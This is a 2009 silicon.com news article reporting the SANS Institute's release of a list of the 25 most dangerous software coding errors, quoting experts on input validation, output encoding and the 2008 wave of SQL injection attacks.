Error, error!
By Tom Espiner
Published: 14 January 2009 08:28 GMT
Security experts from US government agencies, multinational companies and academia have released a list of what they consider to be the 25 most critical errors made while coding software.
Participants from more than 30 organisations worked together to agree on the 25 "most dangerous" errors, the Sans Institute said in a statement on Monday. They included experts from the US National Security Agency, the US Computer Emergency Response Team, Mitre and the Sans Institute, as well as from Apple, Microsoft and Oracle.
Security from A to Z
Click on the links below to find out more...
A is for Antivirus
B is for Botnets
C is for CMA
D is for DDoS
E is for Extradition
F is for Federated identity
G is for Google
H is for Hackers
I is for IM
J is for Jaschan (Sven)
K is for Kids
L is for Love Bug
M is for Microsoft
N is for Neologisms
O is for Orange
P is for Passwords
Q is for Questions
R is for Rootkits
S is for Spyware
T is for Two-factor authentication
U is for USB sticks/devices
V is for Virus variants
W is for Wi-fi
X is for OS X
Y is for You
Z is for Zero-day
The list was released so programmers can check their code for the most common errors that produce security vulnerabilities.
Alan Paller, director of the Sans Institute, told silicon.com sister site ZDNet UK: "[The list] is going to change the way organisations buy software, right away."
The top-two coding errors were improper input validation and improper encoding or escaping of output, according to Steven Christey of Mitre, who said those particular errors "earned the top rating for good reason".
Christey said in a statement: "In 2008, hundreds of thousands of innocent, and generally trusted, web pages were modified to serve malware by automated programs that burrowed into databases using SQL injection.
"The attack worked because countless programmers made the exact same [input validation and improper output encoding] mistakes in their software."
The full list of coding errors, and information on how to fix them, is available from the Sans Institute website.
Original article: Top 25 'most dangerous' coding errors revealed from ZDNet UK
Most of these only apply to web development and no...
Anonymous
That input validation is still a problem is an ind...
misceng
misceng - I was taught that too, we called it 'bom...
Karen Challinor
Implementation, verification and validation of new product features ? Maintenance of released product features ? Agency as defined within The Conduct ...
Examines and audits data for discrepancies; corrects errors, and reconciles data to insure accuracy at several stages of processing. Researches data ...
Clinical SAS Programmers Required with CDISC experience Please note: This role is a homebased opportunity and previous experience in SAS programming ...
Agenda Setters 2009
Welcome to the ninth annual Agenda Setters poll – silicon.com's list of the top 50 most influential individuals in the technology and IT industries, from techies and CIOs to entrepreneurs and business leaders. Find out more in our latest special report.
Is Your Enterprise Architected for Tomorrow's Growth?
Improving IT service delivery through an integrated approach to software asset management...
TechRepublic Resource Guide: Software as a Service (SaaS) for Small and Midsize Businesses...
Download a Free Trial of SmartDraw: Learn why SmartDraw is the ideal alternative...
Stories from the web...
Copyright © 2008 CBS Interactive Limited. All rights reserved. Top of page
Digg
Slashdot
Del.icio.us
Stumble
Reddit
RSS Feeds
Clive Longbottom Windows 7: Not perfect - but ready for prime time Microsoft's latest OS fixes most of Vista's ills - but still has challenges ahead
Stephen Kleynhans Mind the details with Windows 7 Just because it might work better than Vista, it doesn't mean you can be sloppy